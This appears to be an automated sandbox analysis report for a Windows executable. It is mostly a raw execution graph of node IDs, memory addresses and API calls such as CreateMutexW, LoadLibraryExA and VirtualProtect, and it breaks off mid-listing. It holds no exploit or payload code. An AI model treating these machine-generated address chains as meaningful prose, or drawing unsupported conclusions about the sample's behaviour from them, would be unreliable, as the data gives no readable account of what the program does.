                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 725116726046519FC318DF29DC80A6BBBE9FF48360F100A6EF996D7290DB70D904C799
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:3.2%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:1281
                                                                                                                                                                                                                              Total number of Limit Nodes:15
                                                                                                                                                                                                                              execution_graph 75495 7ff772382c6e 75496 7ff772382e9e 75495->75496 75497 7ff772382ca4 75495->75497 75580 7ff77238aca0 75496->75580 75520 7ff7723d1750 75497->75520 75525 7ff7723cf900 75497->75525 75537 7ff772386950 75497->75537 75576 7ff7723d0300 75497->75576 75499 7ff772382dd7 75502 7ff772382cb0 75502->75499 75505 7ff772382d98 75502->75505 75510 7ff77238273d 75502->75510 75513 7ff772383098 75502->75513 75503 7ff772384ac4 75504 7ff772384978 75604 7ff7723d70e0 96 API calls 75504->75604 75505->75499 75508 7ff77238aca0 _free_nolock 94 API calls 75505->75508 75507 7ff772385066 75508->75505 75509 7ff77238aca0 _free_nolock 94 API calls 75509->75513 75510->75510 75510->75513 75515 7ff77238aca0 _free_nolock 94 API calls 75510->75515 75602 7ff772382420 96 API calls 2 library calls 75510->75602 75603 7ff7723c1b70 94 API calls 2 library calls 75510->75603 75512 7ff772384941 75513->75504 75513->75509 75513->75512 75515->75510 75605 7ff7723d5910 75520->75605 75522 7ff7723d1768 75612 7ff77240eda0 75522->75612 75526 7ff7723cf913 __ExceptionPtrDestroy 75525->75526 75632 7ff7723cedf0 75526->75632 75530 7ff7723cf94f __ExceptionPtrDestroy 75531 7ff7723cf97f 75530->75531 75532 7ff7723cfa1b 75530->75532 75646 7ff7723a2250 94 API calls 2 library calls 75530->75646 75531->75502 75648 7ff7723cf5c0 96 API calls 4 library calls 75532->75648 75535 7ff7723cfa05 75647 7ff772390fa0 94 API calls 2 library calls 75535->75647 75538 7ff77238698b 75537->75538 75539 7ff7723869bd 75538->75539 75540 7ff7723869a5 75538->75540 75542 7ff7723869ed 75539->75542 75739 7ff77238cb50 94 API calls _free_nolock 75539->75739 75738 7ff7723851e0 59 API calls _wcsupr_s 75540->75738 75684 7ff772398020 75542->75684 75544 7ff7723869d7 75740 7ff77238d5e0 75544->75740 75547 7ff772386a06 75697 7ff772385690 75547->75697 75550 7ff772386a4d 75552 7ff772386a77 75550->75552 75563 7ff7723869aa 75550->75563 75749 7ff772385500 57 API calls _wcsupr_s 75550->75749 75705 7ff7723866b0 75552->75705 75556 7ff772386ace 75558 7ff772386af0 75556->75558 75562 7ff772386b06 _wcsupr_s 75556->75562 75556->75563 75750 7ff772385530 94 API calls 2 library calls 75558->75750 75560 7ff772386afa 75751 7ff772385c10 98 API calls 2 library calls 75560->75751 75562->75563 75752 7ff77244a1fc 75562->75752 75563->75502 75568 7ff772386b39 75766 7ff772385500 57 API calls _wcsupr_s 75568->75766 75569 7ff772386b54 75769 7ff772385740 117 API calls _wcsupr_s 75569->75769 75572 7ff772386b3e 75767 7ff772385530 94 API calls 2 library calls 75572->75767 75574 7ff772386b48 75768 7ff772385c10 98 API calls 2 library calls 75574->75768 75577 7ff7723d0377 75576->75577 75578 7ff7723d0327 75576->75578 75577->75502 75578->75577 76547 7ff77240ee10 75578->76547 75581 7ff77238acbb 75580->75581 75583 7ff77238acca 75580->75583 76559 7ff772390600 5 API calls _free_nolock 75581->76559 76556 7ff77238aed0 75583->76556 75586 7ff772382ed0 75588 7ff7723930a0 75586->75588 75589 7ff77244aef8 memcpy_s 14 API calls 75588->75589 75590 7ff7723930b3 GetLastError 75589->75590 76561 7ff772393ca0 75590->76561 75593 7ff772393132 76571 7ff7723a40a0 96 API calls memcpy_s 75593->76571 75594 7ff772393156 75596 7ff77239318d 75594->75596 76567 7ff7723a3fc0 75594->76567 75601 7ff77239314f 75596->75601 76572 7ff772393a80 98 API calls _handle_error 75596->76572 75598 7ff77244aef8 memcpy_s 14 API calls 75600 7ff772393294 SetLastError 75598->75600 75600->75503 75601->75598 75602->75510 75603->75510 75604->75507 75606 7ff7723d5945 75605->75606 75607 7ff7723d59af 75605->75607 75606->75607 75609 7ff7723d5980 75606->75609 75611 7ff7723d5956 __ExceptionPtrDestroy 75606->75611 75618 7ff772391310 94 API calls task 75607->75618 75617 7ff7723b2a30 94 API calls type_info::_name_internal_method 75609->75617 75611->75522 75619 7ff77240f000 GetLastError 75612->75619 75614 7ff77240edd3 75625 7ff77240f340 94 API calls 2 library calls 75614->75625 75616 7ff7723d17e7 75616->75502 75617->75611 75618->75611 75626 7ff77240efa0 75619->75626 75622 7ff77240f047 75630 7ff77240ee80 96 API calls 2 library calls 75622->75630 75623 7ff77240f05d SetLastError 75623->75614 75625->75616 75627 7ff77240efb8 75626->75627 75628 7ff77240efd2 LoadLibraryExA 75627->75628 75631 7ff7723b3010 94 API calls strrchr 75627->75631 75628->75622 75628->75623 75630->75623 75631->75628 75633 7ff7723cee25 75632->75633 75635 7ff7723cee4a 75633->75635 75649 7ff772391310 94 API calls task 75633->75649 75635->75530 75636 7ff77240dc40 75635->75636 75637 7ff77240dc70 75636->75637 75645 7ff77240ddcc _handle_error _mbsncpy_s 75637->75645 75650 7ff77240de50 75637->75650 75639 7ff77240dd15 75671 7ff772385074 75639->75671 75641 7ff77240dd4a 75642 7ff77240dd81 75641->75642 75674 7ff77239d720 94 API calls 2 library calls 75641->75674 75675 7ff77240e6e0 94 API calls memcpy_s 75642->75675 75645->75530 75646->75535 75647->75532 75648->75531 75649->75635 75651 7ff77240debb memcpy_s 75650->75651 75659 7ff77240df15 75651->75659 75676 7ff77240da60 94 API calls task 75651->75676 75652 7ff77240df1c 75667 7ff77240e391 75652->75667 75681 7ff772391010 94 API calls std::rsfun 75652->75681 75655 7ff77240e64c 75658 7ff77240e665 75655->75658 75683 7ff772391010 94 API calls std::rsfun 75655->75683 75656 7ff77240e18f 75661 7ff77240e212 75656->75661 75665 7ff77240e1af 75656->75665 75677 7ff772391010 94 API calls std::rsfun 75656->75677 75658->75639 75659->75652 75659->75655 75659->75656 75678 7ff77240dac0 94 API calls 75661->75678 75664 7ff77240e513 75664->75639 75665->75652 75666 7ff77240e30d 75665->75666 75669 7ff77240e2c8 75665->75669 75666->75652 75680 7ff77240da60 94 API calls task 75666->75680 75682 7ff772400960 96 API calls memcpy_s 75667->75682 75669->75652 75679 7ff77240da60 94 API calls task 75669->75679 75672 7ff77238508b CreateMutexW 75671->75672 75672->75641 75674->75642 75675->75645 75676->75659 75677->75661 75678->75665 75679->75652 75680->75652 75681->75667 75682->75664 75683->75658 75685 7ff772398037 75684->75685 75686 7ff77239808d 75685->75686 75785 7ff77238ca10 75685->75785 75791 7ff77238c860 94 API calls 4 library calls 75685->75791 75792 7ff77238dce0 94 API calls strrchr 75685->75792 75770 7ff772394b70 75686->75770 75690 7ff772398100 75781 7ff77238b4e0 75690->75781 75691 7ff77238ca10 task 94 API calls 75696 7ff7723980a9 75691->75696 75694 7ff77239810f 75694->75547 75695 7ff77238d5e0 wcsxfrm 94 API calls 75695->75696 75696->75690 75696->75691 75696->75695 75698 7ff77238d0c0 wcsxfrm 94 API calls 75697->75698 75704 7ff7723856c5 75698->75704 75699 7ff77238571b 75700 7ff77238d5e0 wcsxfrm 94 API calls 75699->75700 75702 7ff772385731 75700->75702 75702->75550 75748 7ff7723868d0 117 API calls 75702->75748 75704->75699 75875 7ff77238c860 94 API calls 4 library calls 75704->75875 75876 7ff77238d7d0 94 API calls 2 library calls 75704->75876 75706 7ff7723866cd 75705->75706 75707 7ff772386872 75706->75707 75708 7ff772386722 75706->75708 75719 7ff772386746 75706->75719 75880 7ff772386230 96 API calls wcsxfrm 75707->75880 75710 7ff77238689e 75708->75710 75711 7ff77238672d 75708->75711 75881 7ff7723862c0 96 API calls 2 library calls 75710->75881 75713 7ff77238674b 75711->75713 75714 7ff772386734 75711->75714 75877 7ff7723857b0 98 API calls 2 library calls 75713->75877 75715 7ff772386816 75714->75715 75716 7ff77238673f 75714->75716 75879 7ff7723860e0 96 API calls 3 library calls 75715->75879 75716->75719 75878 7ff772385840 98 API calls 2 library calls 75716->75878 75719->75556 75719->75563 75721 7ff772385d60 75719->75721 75722 7ff772385d96 75721->75722 75882 7ff772393f90 75722->75882 75725 7ff772385e96 75906 7ff772385300 75725->75906 75729 7ff772385e01 wcsxfrm 75730 7ff772385e76 75729->75730 75731 7ff772385e15 wcsxfrm 75729->75731 75733 7ff77238b4e0 wcsxfrm 94 API calls 75730->75733 75735 7ff772385e49 75731->75735 75905 7ff77238cfa0 94 API calls 2 library calls 75731->75905 75737 7ff772385e58 wcsxfrm 75733->75737 75736 7ff77238b4e0 wcsxfrm 94 API calls 75735->75736 75736->75737 75895 7ff772385430 75737->75895 75738->75563 75739->75544 75741 7ff77238d600 wcsxfrm strrchr 75740->75741 75742 7ff77239b7a0 type_info::_name_internal_method 94 API calls 75741->75742 75743 7ff77238d621 _free_nolock 75742->75743 76492 7ff77239f8b0 75743->76492 75745 7ff77238d647 wcsxfrm 75746 7ff77238d654 wcsxfrm 75745->75746 76508 7ff772382420 94 API calls strrchr 75745->76508 75746->75542 75748->75550 75749->75552 75750->75560 75751->75563 75753 7ff77244a205 75752->75753 75755 7ff772386b2e 75752->75755 75754 7ff77244aef8 memcpy_s 14 API calls 75753->75754 75756 7ff77244a20a 75754->75756 75758 7ff77244a548 75755->75758 76545 7ff772458b14 23 API calls _invalid_parameter_noinfo 75756->76545 75759 7ff77244a55e 75758->75759 75760 7ff77244a551 75758->75760 75762 7ff772386b35 75759->75762 75763 7ff77244aef8 memcpy_s 14 API calls 75759->75763 75761 7ff77244aef8 memcpy_s 14 API calls 75760->75761 75761->75762 75762->75568 75762->75569 75764 7ff77244a595 75763->75764 76546 7ff772458b14 23 API calls _invalid_parameter_noinfo 75764->76546 75766->75572 75767->75574 75768->75563 75769->75563 75793 7ff77238b5f0 75770->75793 75772 7ff77238c7a0 94 API calls wcsxfrm 75778 7ff772394b95 wcsxfrm strrchr __ExceptionPtrDestroy 75772->75778 75773 7ff77238b4e0 wcsxfrm 94 API calls 75773->75778 75774 7ff772394ca8 75775 7ff77238b4e0 wcsxfrm 94 API calls 75774->75775 75776 7ff772394cb7 75775->75776 75776->75696 75778->75772 75778->75773 75778->75774 75778->75776 75779 7ff77238b5f0 wcsxfrm 94 API calls 75778->75779 75797 7ff77238d0c0 75778->75797 75803 7ff77238d4e0 94 API calls 2 library calls 75778->75803 75779->75778 75782 7ff77238b4f8 75781->75782 75783 7ff77238b563 75781->75783 75782->75783 75784 7ff77238aca0 _free_nolock 94 API calls 75782->75784 75783->75694 75783->75783 75784->75783 75786 7ff77238ca3f task _mbsncpy_s 75785->75786 75871 7ff77239ea50 75786->75871 75788 7ff77238ca64 wcsxfrm task 75789 7ff77238cb36 75788->75789 75874 7ff77238ad60 94 API calls _free_nolock 75788->75874 75789->75685 75791->75685 75792->75685 75794 7ff77238b60b wcsxfrm _free_nolock 75793->75794 75795 7ff77238b65b 75794->75795 75804 7ff77238ad60 94 API calls _free_nolock 75794->75804 75795->75778 75798 7ff77238d0ee _mbsncpy_s 75797->75798 75805 7ff77239c600 75798->75805 75800 7ff77238d10b _free_nolock 75801 7ff77238d15b 75800->75801 75809 7ff77238ad60 94 API calls _free_nolock 75800->75809 75801->75778 75803->75778 75804->75795 75806 7ff77239c619 wcsxfrm 75805->75806 75810 7ff77239c5a0 75806->75810 75808 7ff77239c67d 75808->75800 75809->75801 75813 7ff77239dff0 75810->75813 75812 7ff77239c5c5 wcsxfrm 75812->75808 75814 7ff77239e0cc 75813->75814 75815 7ff77239e00d 75813->75815 75816 7ff772398da0 task 94 API calls 75814->75816 75815->75814 75817 7ff77239e023 75815->75817 75818 7ff77239e0db 75816->75818 75826 7ff772398da0 75817->75826 75820 7ff77239e03c 75818->75820 75821 7ff77239e17d 75818->75821 75831 7ff772390950 94 API calls strrchr 75818->75831 75822 7ff77239e1c7 75820->75822 75837 7ff77239de50 94 API calls 2 library calls 75820->75837 75832 7ff772398d00 75821->75832 75822->75812 75838 7ff7723a8b40 75826->75838 75828 7ff772398ded 75828->75820 75831->75821 75833 7ff772398d45 75832->75833 75836 7ff7723a8b40 10 API calls 75832->75836 75834 7ff772398d64 75833->75834 75870 7ff772390690 94 API calls 2 library calls 75833->75870 75834->75820 75836->75833 75837->75822 75839 7ff7723a8b60 75838->75839 75840 7ff7723a8b73 75838->75840 75848 7ff7723aca40 75839->75848 75842 7ff7723a8b8e 75840->75842 75843 7ff7723a8b7b 75840->75843 75844 7ff772398dd6 75842->75844 75862 7ff7723ad9e0 75842->75862 75858 7ff7723ac230 75843->75858 75844->75828 75847 7ff772390690 94 API calls 2 library calls 75844->75847 75847->75828 75849 7ff7723aca60 75848->75849 75853 7ff7723acb15 75848->75853 75850 7ff7723acad6 75849->75850 75854 7ff7723acb21 75849->75854 75851 7ff7723a8c90 GetLastError VirtualQuery VirtualFree SetLastError 75850->75851 75851->75853 75852 7ff7723acfc2 75852->75853 75855 7ff7723aaf30 GetLastError VirtualQuery VirtualFree SetLastError 75852->75855 75853->75844 75854->75852 75854->75853 75857 7ff7723ad074 75854->75857 75855->75853 75856 7ff7723aa720 GetLastError VirtualQuery VirtualFree SetLastError 75856->75853 75857->75853 75857->75856 75860 7ff7723ac260 75858->75860 75859 7ff7723aa3f0 6 API calls 75861 7ff7723ac2e0 75859->75861 75860->75859 75860->75861 75861->75844 75863 7ff7723ada0d 75862->75863 75866 7ff7723ada01 75862->75866 75864 7ff7723adab6 75863->75864 75865 7ff7723aca40 GetLastError VirtualQuery VirtualFree SetLastError 75863->75865 75864->75866 75867 7ff7723ac230 6 API calls 75864->75867 75865->75864 75866->75844 75868 7ff7723adcff memcpy_s 75867->75868 75868->75866 75869 7ff7723aca40 GetLastError VirtualQuery VirtualFree SetLastError 75868->75869 75869->75866 75870->75834 75872 7ff772398da0 task 94 API calls 75871->75872 75873 7ff77239ea7b 75872->75873 75873->75788 75874->75789 75875->75704 75876->75704 75877->75719 75878->75719 75879->75719 75880->75719 75881->75719 75914 7ff772394050 75882->75914 75884 7ff772385dd4 75884->75725 75885 7ff77238cde0 75884->75885 75886 7ff77238ce00 wcsxfrm strrchr 75885->75886 75887 7ff77239b7a0 type_info::_name_internal_method 94 API calls 75886->75887 75888 7ff77238ce21 _free_nolock 75887->75888 76448 7ff77239f6e0 75888->76448 75890 7ff77238ce47 75893 7ff77238ce8a wcsxfrm 75890->75893 76455 7ff772382420 94 API calls strrchr 75890->76455 75892 7ff77238cf04 75892->75729 75893->75892 76456 7ff77238ad60 94 API calls _free_nolock 75893->76456 75896 7ff77238544c 75895->75896 75897 7ff77238ca10 task 94 API calls 75896->75897 75898 7ff772385468 wcsxfrm 75897->75898 76459 7ff77244a97c 75898->76459 75903 7ff77244a97c 17 API calls 75904 7ff7723854c8 wcsxfrm 75903->75904 75904->75725 75905->75731 75907 7ff77238536b 75906->75907 75908 7ff772385314 wcsxfrm 75906->75908 75907->75556 75908->75907 76490 7ff77238c230 94 API calls 3 library calls 75908->76490 75910 7ff772385339 76491 7ff772385250 60 API calls _wcsupr_s 75910->76491 75912 7ff77238535c 75913 7ff77238b4e0 wcsxfrm 94 API calls 75912->75913 75913->75907 75915 7ff772394083 75914->75915 75918 7ff7723940f5 _wcsupr_s 75914->75918 75942 7ff77244b114 75915->75942 75961 7ff772393e80 75918->75961 75919 7ff7723940a4 75985 7ff77244aef8 75919->75985 75920 7ff7723940d9 75990 7ff77238c990 94 API calls 2 library calls 75920->75990 75924 7ff77239413f 75967 7ff77244b02c 75924->75967 75929 7ff7723940b0 75989 7ff77238c990 94 API calls 2 library calls 75929->75989 75931 7ff7723941e3 _wcsupr_s 75936 7ff7723940cf _handle_error 75931->75936 75973 7ff77244af9c 75931->75973 75932 7ff772394155 75933 7ff77244aef8 memcpy_s 14 API calls 75932->75933 75935 7ff77239419e 75933->75935 75991 7ff77244b448 23 API calls 3 library calls 75935->75991 75936->75884 75938 7ff7723941a5 75992 7ff77238c990 94 API calls 2 library calls 75938->75992 75940 7ff7723941c7 75940->75936 75941 7ff77244af9c _wcsupr_s 57 API calls 75940->75941 75941->75936 75943 7ff77244b058 75942->75943 75944 7ff77244b075 75943->75944 75947 7ff77244b0a1 75943->75947 75945 7ff77244aef8 memcpy_s 14 API calls 75944->75945 75946 7ff77244b07a 75945->75946 76005 7ff772458b14 23 API calls _invalid_parameter_noinfo 75946->76005 75949 7ff77244b0b3 75947->75949 75950 7ff77244b0a6 75947->75950 75993 7ff77245d698 75949->75993 75951 7ff77244aef8 memcpy_s 14 API calls 75950->75951 75960 7ff772394097 75951->75960 75954 7ff77244b0c7 75956 7ff77244aef8 memcpy_s 14 API calls 75954->75956 75955 7ff77244b0d4 76000 7ff77245dabc 75955->76000 75956->75960 75958 7ff77244b0e8 tmpfile 76006 7ff772431c84 LeaveCriticalSection 75958->76006 75960->75919 75960->75920 75962 7ff772393ec6 _mbsncpy_s 75961->75962 76126 7ff772383037 75962->76126 75966 7ff772393f41 _mbsncpy_s 75966->75924 75968 7ff77239414d 75967->75968 75969 7ff77244b035 75967->75969 75968->75931 75968->75932 75970 7ff77244aef8 memcpy_s 14 API calls 75969->75970 75971 7ff77244b03a 75970->75971 76406 7ff772458b14 23 API calls _invalid_parameter_noinfo 75971->76406 75974 7ff77244afb3 75973->75974 75976 7ff77244afd1 75973->75976 75975 7ff77244aef8 memcpy_s 14 API calls 75974->75975 75978 7ff77244afb8 75975->75978 75981 7ff77244afc3 tmpfile 75976->75981 76407 7ff772431c78 EnterCriticalSection 75976->76407 76408 7ff772458b14 23 API calls _invalid_parameter_noinfo 75978->76408 75979 7ff77244afe7 75982 7ff77244af18 _wcsupr_s 55 API calls 75979->75982 75981->75936 75983 7ff77244aff0 75982->75983 75984 7ff772431c84 _fread_nolock LeaveCriticalSection 75983->75984 75984->75981 76409 7ff77245ab1c GetLastError 75985->76409 75987 7ff7723940a9 75988 7ff77244b448 23 API calls 3 library calls 75987->75988 75988->75929 75989->75936 75990->75918 75991->75938 75992->75940 76007 7ff7724591ac EnterCriticalSection 75993->76007 75995 7ff77245d6af 75996 7ff77245d70c tmpfile 17 API calls 75995->75996 75997 7ff77245d6ba 75996->75997 75998 7ff772459200 _isindst LeaveCriticalSection 75997->75998 75999 7ff77244b0bd 75998->75999 75999->75954 75999->75955 76008 7ff77245d7f8 76000->76008 76004 7ff77245db16 76004->75958 76005->75960 76013 7ff77245d822 _wcsupr_s 76008->76013 76009 7ff77244aef8 memcpy_s 14 API calls 76010 7ff77245da9b 76009->76010 76026 7ff772458b14 23 API calls _invalid_parameter_noinfo 76010->76026 76012 7ff77245d9de 76012->76004 76020 7ff772461dd8 76012->76020 76013->76013 76017 7ff77245d9d5 76013->76017 76023 7ff77246b0e4 26 API calls 3 library calls 76013->76023 76015 7ff77245da36 76015->76017 76024 7ff77246b0e4 26 API calls 3 library calls 76015->76024 76017->76009 76017->76012 76018 7ff77245da57 76018->76017 76025 7ff77246b0e4 26 API calls 3 library calls 76018->76025 76027 7ff772461698 76020->76027 76023->76015 76024->76018 76025->76017 76026->76012 76028 7ff7724616cd 76027->76028 76029 7ff7724616af 76027->76029 76028->76029 76031 7ff7724616e9 76028->76031 76030 7ff77244aef8 memcpy_s 14 API calls 76029->76030 76032 7ff7724616b4 76030->76032 76038 7ff772461cc0 76031->76038 76049 7ff772458b14 23 API calls _invalid_parameter_noinfo 76032->76049 76036 7ff7724616c0 76036->76004 76051 7ff772433ea8 76038->76051 76044 7ff772461d23 76059 7ff772454f28 76044->76059 76045 7ff772461d7b 76047 7ff772461714 76045->76047 76125 7ff772459294 14 API calls 2 library calls 76045->76125 76047->76036 76050 7ff772467978 LeaveCriticalSection 76047->76050 76049->76036 76052 7ff772433ecc 76051->76052 76058 7ff772433ec7 76051->76058 76053 7ff77245a9a0 wcsftime 26 API calls 76052->76053 76052->76058 76054 7ff772433ee7 76053->76054 76055 7ff77245ac48 wcsftime 26 API calls 76054->76055 76056 7ff772433f0a 76055->76056 76057 7ff77245ac7c wcsftime 26 API calls 76056->76057 76057->76058 76058->76044 76124 7ff7724595a0 5 API calls try_get_function 76058->76124 76060 7ff772454f73 76059->76060 76061 7ff772454f51 76059->76061 76062 7ff772454fcc 76060->76062 76063 7ff772454f77 76060->76063 76064 7ff772459294 __free_lconv_mon 14 API calls 76061->76064 76071 7ff772454f5f 76061->76071 76065 7ff772462ff4 _Wcsftime MultiByteToWideChar 76062->76065 76066 7ff772454f8b 76063->76066 76067 7ff772459294 __free_lconv_mon 14 API calls 76063->76067 76063->76071 76064->76071 76074 7ff772454fe7 76065->76074 76068 7ff77245a290 wcsftime 15 API calls 76066->76068 76067->76066 76068->76071 76069 7ff772454fee GetLastError 76072 7ff77244ae88 wcsftime 14 API calls 76069->76072 76070 7ff772455027 76070->76071 76075 7ff772462ff4 _Wcsftime MultiByteToWideChar 76070->76075 76071->76045 76081 7ff772461e0c 76071->76081 76076 7ff772454ffb 76072->76076 76073 7ff77245501b 76078 7ff77245a290 wcsftime 15 API calls 76073->76078 76074->76069 76074->76070 76074->76073 76077 7ff772459294 __free_lconv_mon 14 API calls 76074->76077 76079 7ff77245506f 76075->76079 76080 7ff77244aef8 memcpy_s 14 API calls 76076->76080 76077->76073 76078->76070 76079->76069 76079->76071 76080->76071 76082 7ff7724619f0 tmpfile 23 API calls 76081->76082 76083 7ff772461e53 76082->76083 76084 7ff772461e99 76083->76084 76085 7ff772461e81 76083->76085 76086 7ff7724679a0 tmpfile 18 API calls 76084->76086 76087 7ff77244aed8 tmpfile 14 API calls 76085->76087 76088 7ff772461e9e 76086->76088 76089 7ff772461e86 76087->76089 76090 7ff772461ebe CreateFileW 76088->76090 76091 7ff772461ea5 76088->76091 76092 7ff77244aef8 memcpy_s 14 API calls 76089->76092 76094 7ff772461f29 76090->76094 76095 7ff772461fa4 GetFileType 76090->76095 76093 7ff77244aed8 tmpfile 14 API calls 76091->76093 76096 7ff772461e92 76092->76096 76099 7ff772461eaa 76093->76099 76100 7ff772461f71 GetLastError 76094->76100 76104 7ff772461f37 CreateFileW 76094->76104 76097 7ff772462002 76095->76097 76098 7ff772461fb1 GetLastError 76095->76098 76096->76045 76107 7ff7724678b8 tmpfile 15 API calls 76097->76107 76102 7ff77244ae88 wcsftime 14 API calls 76098->76102 76103 7ff77244aef8 memcpy_s 14 API calls 76099->76103 76101 7ff77244ae88 wcsftime 14 API calls 76100->76101 76101->76089 76105 7ff772461fc0 CloseHandle 76102->76105 76103->76089 76104->76095 76104->76100 76105->76089 76106 7ff772461ff2 76105->76106 76108 7ff77244aef8 memcpy_s 14 API calls 76106->76108 76109 7ff772462024 76107->76109 76111 7ff772461ff7 76108->76111 76110 7ff772462074 76109->76110 76112 7ff772461bfc tmpfile 62 API calls 76109->76112 76113 7ff77246175c tmpfile 62 API calls 76110->76113 76115 7ff77246207b 76110->76115 76111->76089 76112->76110 76114 7ff7724620b2 76113->76114 76114->76115 76116 7ff7724620bc 76114->76116 76117 7ff77245d5d8 tmpfile 26 API calls 76115->76117 76116->76096 76118 7ff77246213c CloseHandle CreateFileW 76116->76118 76117->76096 76119 7ff772462183 GetLastError 76118->76119 76120 7ff7724621b1 76118->76120 76121 7ff77244ae88 wcsftime 14 API calls 76119->76121 76120->76096 76122 7ff772462190 76121->76122 76123 7ff772467ae0 tmpfile 15 API calls 76122->76123 76123->76120 76124->76044 76125->76047 76142 7ff77238b3d0 76126->76142 76147 7ff7723a64e4 76126->76147 76152 7ff772394490 76126->76152 76127 7ff772382ddf 76135 7ff7723a73c0 76127->76135 76129 7ff772382fd8 76129->76126 76129->76127 76131 7ff772382420 76129->76131 76130 7ff7723834d2 76131->76130 76131->76131 76166 7ff7723a0f90 94 API calls 2 library calls 76131->76166 76400 7ff7723a6f90 76135->76400 76138 7ff7723a6f90 _mbsncpy_s 10 API calls 76139 7ff7723a742c 76138->76139 76403 7ff7723a7010 76139->76403 76167 7ff772398450 76142->76167 76201 7ff7723ea950 76147->76201 76149 7ff7723a6505 76227 7ff7723a5590 76149->76227 76151 7ff7723a650f 76151->76129 76315 7ff7723a7170 76152->76315 76154 7ff77239456d 76155 7ff772394574 76154->76155 76156 7ff772394585 76154->76156 76328 7ff7723b4c00 76155->76328 76344 7ff7723b6200 94 API calls 5 library calls 76156->76344 76159 7ff7723944cf __ExceptionPtrDestroy 76159->76154 76342 7ff7723905a0 94 API calls 2 library calls 76159->76342 76160 7ff77239457e 76345 7ff77239eae0 94 API calls 76160->76345 76162 7ff7723945b6 76162->76129 76164 7ff77239454c 76343 7ff772390600 5 API calls _free_nolock 76164->76343 76166->76131 76168 7ff772398484 76167->76168 76169 7ff77238b3ed 76167->76169 76168->76169 76175 7ff77239a690 76168->76175 76171 7ff772398420 76169->76171 76172 7ff772398429 76171->76172 76173 7ff77238b3f7 76172->76173 76191 7ff77239a850 76172->76191 76173->76129 76176 7ff77239a707 76175->76176 76181 7ff772382f8a 76176->76181 76178 7ff77239a7dd 76179 7ff77239a844 76178->76179 76190 7ff772390600 5 API calls _free_nolock 76178->76190 76179->76168 76185 7ff772382fab 76181->76185 76182 7ff7723a0f90 strrchr 94 API calls 76184 7ff772382420 76182->76184 76183 7ff7723834d2 76183->76183 76184->76182 76184->76183 76185->76184 76186 7ff772382ddf 76185->76186 76187 7ff772394490 94 API calls 76185->76187 76188 7ff77238b3d0 94 API calls 76185->76188 76189 7ff7723a64e4 94 API calls 76185->76189 76186->76178 76187->76185 76188->76185 76189->76185 76190->76179 76192 7ff77239a888 76191->76192 76193 7ff77239a8bd 76192->76193 76194 7ff77239a9a3 wcsxfrm 76192->76194 76200 7ff77239d720 94 API calls 2 library calls 76193->76200 76196 7ff77239a690 94 API calls 76194->76196 76198 7ff77239a99e 76194->76198 76196->76198 76197 7ff77239a94c 76197->76198 76199 7ff77239a690 94 API calls 76197->76199 76198->76172 76199->76198 76200->76197 76202 7ff7723ea9b7 76201->76202 76202->76202 76237 7ff7723ea900 76202->76237 76204 7ff7723eaa15 76241 7ff7723a37c0 76204->76241 76206 7ff7723eaa87 76244 7ff7723daa20 76206->76244 76212 7ff7723ef750 5 API calls 76216 7ff7723eabb7 76212->76216 76213 7ff7723eb460 94 API calls 76213->76216 76214 7ff7723ef660 94 API calls 76214->76216 76216->76212 76216->76213 76216->76214 76221 7ff7723eaebf memcpy_s 76216->76221 76223 7ff7723a37c0 94 API calls 76216->76223 76253 7ff7723fe3a0 76216->76253 76257 7ff7723ee150 76216->76257 76263 7ff7723f21b0 76216->76263 76271 7ff7723fe040 94 API calls 76216->76271 76272 7ff7723fcc10 RtlCaptureContext RtlLookupFunctionEntry RtlRestoreContext RtlVirtualUnwind RaiseException 76216->76272 76273 7ff7723f04a0 94 API calls 76216->76273 76274 7ff7723fd4f0 94 API calls 2 library calls 76216->76274 76267 7ff7723ef750 76221->76267 76223->76216 76226 7ff7723eaff8 _handle_error 76226->76149 76228 7ff7723a5611 76227->76228 76294 7ff7723daa90 76228->76294 76230 7ff7723a597e 76230->76151 76231 7ff7723a583b 76231->76230 76297 7ff7723fee70 94 API calls 2 library calls 76231->76297 76233 7ff7723a589d 76233->76230 76298 7ff77239b7a0 76233->76298 76235 7ff7723a58e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76307 7ff7723ff070 94 API calls _wcsupr_s 76235->76307 76238 7ff7723ea926 76237->76238 76239 7ff7723ea930 76237->76239 76276 7ff772405d90 94 API calls _free_nolock 76238->76276 76239->76204 76242 7ff772398d00 _free_nolock 94 API calls 76241->76242 76243 7ff7723a383b memcpy_s 76242->76243 76243->76206 76245 7ff7723daa3d 76244->76245 76246 7ff7723daa49 76244->76246 76277 7ff7723db0e0 76245->76277 76280 7ff7723daee0 76246->76280 76249 7ff7723daa47 76250 7ff7723fc660 76249->76250 76286 7ff7723f2a10 94 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76250->76286 76252 7ff7723fc685 76252->76216 76254 7ff7723fe3e6 76253->76254 76256 7ff7723fe5dd 76254->76256 76287 7ff7723a36b0 5 API calls 2 library calls 76254->76287 76256->76216 76260 7ff7723ee16f 76257->76260 76258 7ff7723ee273 76258->76216 76259 7ff7723ee1e6 76259->76258 76262 7ff7723eb460 94 API calls 76259->76262 76260->76259 76288 7ff7723eb460 76260->76288 76262->76259 76265 7ff7723f21c8 type_info::_name_internal_method 76263->76265 76264 7ff7723f2291 76264->76216 76265->76264 76292 7ff7723ee540 94 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76265->76292 76268 7ff7723ef775 76267->76268 76269 7ff7723eaf63 76267->76269 76268->76269 76293 7ff7723a36b0 5 API calls 2 library calls 76268->76293 76269->76226 76275 7ff7723a36b0 5 API calls 2 library calls 76269->76275 76271->76216 76272->76216 76273->76216 76274->76216 76275->76226 76276->76239 76278 7ff7723daf50 7 API calls 76277->76278 76279 7ff7723db13e 76278->76279 76279->76249 76281 7ff7723daefe 76280->76281 76282 7ff7723daf2e 76280->76282 76283 7ff7723dade0 VirtualProtect 76281->76283 76282->76249 76284 7ff7723daf20 76283->76284 76284->76282 76285 7ff7723dae40 94 API calls 76284->76285 76285->76282 76286->76252 76287->76256 76289 7ff7723eb483 76288->76289 76290 7ff7723eb48d 76288->76290 76291 7ff7723eb410 94 API calls 76289->76291 76290->76260 76291->76290 76292->76265 76293->76269 76295 7ff7723daee0 94 API calls 76294->76295 76296 7ff7723daabe 76295->76296 76296->76231 76297->76233 76299 